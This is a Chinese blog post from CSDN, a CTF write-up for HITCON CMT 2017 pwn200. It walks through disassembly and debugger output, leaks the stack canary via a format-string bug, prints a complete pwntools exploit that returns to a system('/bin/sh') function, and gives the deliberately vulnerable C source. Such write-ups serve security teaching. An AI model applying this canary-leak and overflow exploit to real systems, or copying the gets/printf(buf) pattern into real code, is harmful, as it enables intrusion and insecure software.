HITCON_CMT_2017_pwn200

最新推荐文章于 2022-04-25 19:51:47 发布
最新推荐文章于 2022-04-25 19:51:47 发布
阅读量1.9k 收藏 1
点赞数
分类专栏: bin # pwn 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Ga4ra/article/details/123667812
版权
bin 同时被 2 个专栏收录
41 篇文章 1 订阅
订阅专栏
pwn
12 篇文章 0 订阅
订阅专栏

文章目录


文件下载

1. 基本信息

file:

$ file HITCON_CMT_2017_pwn200
HITCON_CMT_2017_pwn200: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=57aa66342051fe3bfe3a1005164786816c22a485, with debug_info, not stripped

checksec:

$ checksec HITCON_CMT_2017_pwn200
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE

注意有canary栈保护。

反汇编

objdump -d -M intel

0804854d <canary_protect_me>:
 804854d:       55                      push   ebp
 804854e:       89 e5                   mov    ebp,esp
 8048550:       83 ec 18                sub    esp,0x18
 8048553:       c7 04 24 90 86 04 08    mov    DWORD PTR [esp],0x8048690
 804855a:       e8 b1 fe ff ff          call   8048410 <system@plt>
 804855f:       c9                      leave
 8048560:       c3                      ret

08048561 <main>:
...
 804856a:       65 a1 14 00 00 00       mov    eax,gs:0x14
 8048570:       89 44 24 3c             mov    DWORD PTR [esp+0x3c],eax
...
 80485c0:       8d 44 24 14             lea    eax,[esp+0x14]
 80485c4:       89 04 24                mov    DWORD PTR [esp],eax
 80485c7:       e8 24 fe ff ff          call   80483f0 <gets@plt>
 80485cc:       8d 44 24 14             lea    eax,[esp+0x14]
 80485d0:       89 04 24                mov    DWORD PTR [esp],eax
 80485d3:       e8 08 fe ff ff          call   80483e0 <printf@plt>
 80485d8:       8d 44 24 14             lea    eax,[esp+0x14]
 80485dc:       89 04 24                mov    DWORD PTR [esp],eax
 80485df:       e8 0c fe ff ff          call   80483f0 <gets@plt>
...
 80485e9:       8b 54 24 3c             mov    edx,DWORD PTR [esp+0x3c]
 80485ed:       65 33 15 14 00 00 00    xor    edx,DWORD PTR gs:0x14
 80485f6:       e8 05 fe ff ff          call   8048400 <__stack_chk_fail@plt>
...

canary_protect_me里system的参数应该是sh,验证一下。先判断加载基址,再用string命令查看字符串:

$ readelf -l HITCON_CMT_2017_pwn200  

Elf file type is EXEC (Executable file)
Entry point 0x8048450
There are 9 program headers, starting at offset 52

Program Headers:
  Type           Offset   VirtAddr   PhysAddr   FileSiz MemSiz  Flg Align
...
	LOAD           0x000000 0x08048000 0x08048000 0x0079c 0x0079c R E 0x1000
...
$ strings -t x HITCON_CMT_2017_pwn200  | grep 690
    690 /bin/sh

main函数流程:

  1. setvbuf设置输入输出缓冲区;
  2. canary存在esp+0x3c
  3. gets(buf),buf位于esp+0x14
  4. printf(buf)
  5. gets(buf)
  6. 检查canary

思路

  1. 第1个gets,利用格式化字符串漏洞读出canary的值;
  2. 第2个gets,覆盖返回地址为canary_protect_me,执行system获取shell,覆盖时canary的值不能变。

3. 调试

main开始处,确认一下canary地址是0xffffd40c,值为0x4637a300:

 EAX  0x4637a300
...
 EBP  0xffffd418 ◂— 0x0
 ESP  0xffffd3d0 —▸ 0xf7fb5000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1d7d8c
*EIP  0x8048574 (main+19) ◂— xor    eax, eax
──────────────────────────────────────────────────────[ DISASM ]──────────────────────────────────────────────────────
   0x804856a <main+9>     mov    eax, dword ptr gs:[0x14]
   0x8048570 <main+15>    mov    dword ptr [esp + 0x3c], eax
 ► 0x8048574 <main+19>    xor    eax, eax
pwndbg> x /x $esp + 0x3c
0xffffd40c:     0x50495500

第一个gets,输入16个a,查看栈数据:

0x80485d3 <main+114>    call   printf@plt                     <printf@plt>
        format: 0xffffd3e4 ◂— 'aaaaaaaaaaaaaaaa'
        vararg: 0x0
pwndbg> x /40x $esp
0xffffd3d0:     0xffffd3e4      0x00000000      0x00000001      0x00000000
0xffffd3e0:     0xf7fb53fc      0x61616161      0x61616161      0x61616161
0xffffd3f0:     0x61616161      0xffffd400      0xffffd4bc      0xf7e0d875
0xffffd400:     0xf7fe5970      0x00000000      0x0804860b      0x4637a300  
0xffffd410:     0xf7fb5000      0xf7fb5000      0x00000000      0xf7df5fa1
...

(0xffffd40c - 0xffffd3d0)/4 == 15 (或者0xffffd410 - 0xffffd3d4再除以4),canary是第15个参数,那么输入%15$x就能获取canary。

buf与canary地址相差0xffffd40c-0xffffd3e4==40个字节

ebp值为0xffffd418,那么返回地址就是位于0xffffd418 + 4, 与canary相差0xffffd418+4-0xffffd410==12个字节

第2次gets发送的payload的结构:

40个字节
canary
12个字节
canary_protect_me地址:0x0804854d

4. exp

可以先down下来,用process或gdb.debug调试:

from pwn import *

context.log_level = 'debug'


pSystemBinsh = 0x0804854d
program = "./HITCON_CMT_2017_pwn200"
p = process([program])
# p = gdb.debug(program, "b main")
# pause()

p.sendline("%15$x")

canary = int(p.recv(timeout=5), 16)
log.info("canary: 0x%x" % canary)

payload = bytes("a"*40, encoding="ascii")
payload += p32(canary)
payload += bytes("a"*12, encoding="ascii")
payload += p32(pSystemBinsh)

# gdb.attach(p)
# pause()
p.sendline(payload)


p.interactive()

源码

#include <stdio.h>
#include <stdlib.h>

void canary_protect_me(void)
{
    system("/bin/sh");
}

int main(void)
{
    setvbuf(stdout, 0LL, _IONBF, 0LL);
    setvbuf(stdin, 0LL, _IOLBF, 0LL);

    char buf[40];
    gets(buf);
    printf(buf);
    gets(buf);
    
    return 0;
}
CodeStarr
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2017湖湘杯pwn200
12-02
2017湖湘杯pwn200的题目,请大家自行下载。。。。。。
HITCON CMT2017-pwn200-wp
fa1c4的blog
02-02 532
HITCON community 2017的一道pwn题 #include<stdio.h> #include<stdlib.h> void canary_protect_me(){ system("/bin/sh"); } int main(){ setvbuf(stdout, 0LL, 2, 0LL); setvbuf(stdin, 0LL, 1, 0LL); char buf[40]; gets(buf); printf(buf)
攻防世界pwn200
qq_25044201的博客
01-17 236
因为学校放假再加上回家学车,学习进度耽搁一段时间。算了废话少说 来看题 用ida分析 发现与之前做的level3极其相似 但是没有给libc库,所以我们得安装LibcSearcher这个能根据你所给的函数来计算libc的版本,进而得到system和bin_sh的地址 这里是准备工作 这里是获取pwn200文件中的有用地址 这里通过write函数泄露write的真实地址(got表里的地址才是真是地址,通过write函数显示在标准输入上) 获得libc的基地址,然后计算system和bin_sh的
PWN学习笔记--HCTF2017 pwn200
I have a dream
04-25 424
参考链接:https://bbs.pediy.com/thread-224645.htm 考点:格式化字符串、GOT覆盖 思路:首先利用格式化字符串泄露出puts函数的实际地址,然后根据libc计算出system的地址。接着用得到的system的地址覆盖atoi的got地址,最后传入/bin/sh参数即可。 漏洞程序: 2017湖湘杯pwn200 漏洞利用程序: from pwn import ...
HITCON CTF 2017
11-08
HITCON CTF 2017 所有题目整理.....................................................................................................................................................................................................................
HITCON_2018_children_tcache
u014377094的博客
03-20 422
惯例checksec一下 ida打开还是熟悉的malloc,free和show模块 strcpy存在off-by-one漏洞 思路还是创建两个大于tcache大小的chunk,中间夹一个tcache可存储大小的chunk。 通过extend再改变unsortedbin头位置泄露mainarena位置找到libc基址,最后doublefree实现对hook的更改。 add(0x410,b'a') add(0xe8,b'a') add(0x4f0,b'a') add(0x60,b'a') fr
信息安全_数据安全_HITCON_Badge_2019_秘辛:MCU_ARM_Tru.pdf
08-22
【标题】"信息安全_数据安全_HITCON_Badge_2019_秘辛:MCU_ARM_Tru.pdf" 涉及的是2019年HITCON活动的安全挑战,重点在于利用ARM TrustZone技术在微控制器(MCU)上的应用,特别是与数据安全和信息安全建设相关的内容...
信息安全_数据安全_HITCON_GIRLS_成果分享與_CyberSec_week.pdf
08-22
HITCON GIRLS是一个以女性为主体的信息安全社区,致力于推广信息安全学习和提升科技行业的包容性。 【HITCON GIRLS】 HITCON GIRLS社区通过组织各种主题的读书会,鼓励女性成员深入学习信息安全知识和技术,促进...
台灣駭客年會 HITCON CMT 2017 - 安全技术资料汇总(共3份).zip
02-06
Breaking_into_the_iCloud_Keychain.pdf CSCS_以技術力協助公民社會的初次嘗試.pdf 臺灣資安人才教育_Cybersecurity_Education_in_Taiwan.pdf
heap_exploit_2.31
03-21
堆攻击2.31 glibc 2.31版中有关ptmalloc的堆利用。 堆开发清单 在2.29和2.31之间进行堆利用技术,并收集有关相应利用技术的CTF挑战。... pwngdb是用于堆利用的出色gdb脚本,但是在glibc 2.31中,tcache结构发生了
2017湖湘杯pwn200_wp_格式化字符串漏洞
aptx4869_li的博客
01-02 1589
本文是格式化字符串漏洞的利用,题目为2017年湖湘杯pwn200,题目文件 链接:https://pan.baidu.com/s/1geZAemZ 密码:b51f 0x0001 看文件类型为elf文件,用  binwalk  查看一下: 一个32位的文件,用IDA看看: main函数: sub_80485CD():
linux调用system参数格式化,湖湘杯2017 PWN 200格式化字符串漏洞详细WriteUp
weixin_35948624的博客
05-12 208
*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。格式化字符串漏洞原理pwn题中,有形如下述代码的形式就是格式化字符串漏洞charstr[100];scarf("%s",str);printf(str)也许使用者的目的只是直接输出字符串,但是这段字符串来源于可控的输入,就造成了漏洞。示例程序如下编译:gcc -m32 -o str...
2021-09-07 BUUCTF-PWN 刷题记录
m0_56897090的博客
09-07 571
2021-09-07 roarctf_2019_easy_pwn 0x00 题目分析 堆题 整体功能 增加 删除 修改 输出 保护情况: root@ubuntu:~## pwn checksec roa* [*] '/root/roarctf_2019_easy_pwn' Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE:
HITCON2017-Web-writeup
无节操
10-27 1791
HITCON2017-Web-writeupProblemsbabyfirst-revenge Problems babyfirst-revenge Description: <?php $sandbox = '/www/sandbox/' . md5("orange" . $_SERVER['REMOTE_ADDR']); @mkdir($sandbox); @ch...
QEMU System环境
Starr
04-06 3759
文章目录1. 安装2. 网络配置关于tap网卡3. 其它使用方法4. 参考资料 文档:https://www.qemu.org/docs/master/ Wiki: https://wiki.qemu.org/Main_Page Qemu Mips文档:https://www.qemu.org/docs/master/system/target-mips.html 1. 安装 本文以mips小端版本为例: sudo apt install qemu-system-mipsel -y 然后下载mips的内核
png隐写
Starr
03-01 3305
文章目录1. PNG格式2. 功能设计3. 读取并解析png验证magic解析main4. 编码payload 隐写:将信息植入其它数据,并可以提取出来。 仅关键逻辑提供源码。 1. PNG格式 PNG官网介绍了png的文件格式,可供参考。 也可以用010editor的png模板。 简述一下,首先是8字节magic: 89 50 4E 47 0D 0A 1A 0A 直接用uint64表示即可: type Header struct { magic uint64 // 0:8 } 然后是块(chunk
QilingLab练习
Starr
04-25 3138
文章目录1. 简介安装2. QuickStart3. qltool4. QilingLab练习challenge 1 - memory map解challenge 2 - set_syscall解challenge 3 - add_fs_mapper解challenge 4 - hook_address解challenge 5 - set_api解challenge 6challenge 7 - 3种思路解1解2解3challenge 8逆向解1-读栈解2-搜索内存challenge 9challenge
恶意程序分类
Starr
06-24 3056
文章目录后门或陷门逻辑炸弹特洛伊木马Zombie(肉机)病 毒分类蠕 虫防病毒软件 graph TD a[malicious programs]-->b[needs host program] a-->c[independent] b-->d[trapdoors] b-->e[logicbombs] b-->f[Tr...
[hitcon 2017]ssrfme 1
最新发布
04-11
这道题目是一个SSRF漏洞题目。SSRF全称为Server Side Request Forgery,是一种常见的Web安全漏洞。当存在SSRF漏洞时,攻击者可以将服务器作为代理,进而访问在内部网络中无法访问的资源,如内部Web应用、数据库等。此题的目标是通过一个输入参数包含的URL,探测出内部的flag并输出。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值